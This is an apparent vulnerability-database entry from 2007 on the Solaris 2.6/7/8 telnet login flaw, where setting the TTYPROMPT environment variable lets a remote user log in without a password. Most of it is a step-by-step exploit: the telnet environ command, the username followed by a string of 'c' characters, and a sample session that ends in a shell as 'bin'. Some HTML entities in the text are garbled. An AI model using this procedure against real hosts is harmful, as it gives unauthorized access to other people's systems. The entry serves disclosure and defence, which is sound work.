Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass

🗓️ 20 Sep 2007 00:00:00Reported by RootType

Solaris TTYPROMPT security vulnerability allows remote authentication bypass via telnet. Attacker defines TTYPROMPT env var, overflows integer inside login, and logs in without authentication


                                                Solaris TTYPROMPT Security Vulnerability (Telnet)

This vulnerability is very simple to exploit, since it does not require 
any code to be compiled by an attacker. The vulnerability only requires 
the attacker to simply define the environment variable TTYPROMPT to a 
6-character string, inside telnet. Jonathan believes this overflows an 
integer inside login, which specifies whether the user has been 
authenticated (just a guess).

Once connected to the remote host, you must type the username, followed 
by 64 &amp;quot; c&amp;quot;s, and a literal &amp;quot;
&amp;quot;. You will then be logged in as the user 
without any password authentication. This should work with any account 
except root (unless remote root login is allowed). 

Example: 
coma% telnet 
telnet&amp;gt; environ define TTYPROMPT abcdef 
telnet&amp;gt; o localhost 

SunOS 5.8 

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
 
Last login: whenever 
$ whoami bin 

# sebug.net

20 Sep 2007 00:00Current

7.1High risk

Vulners AI Score7.1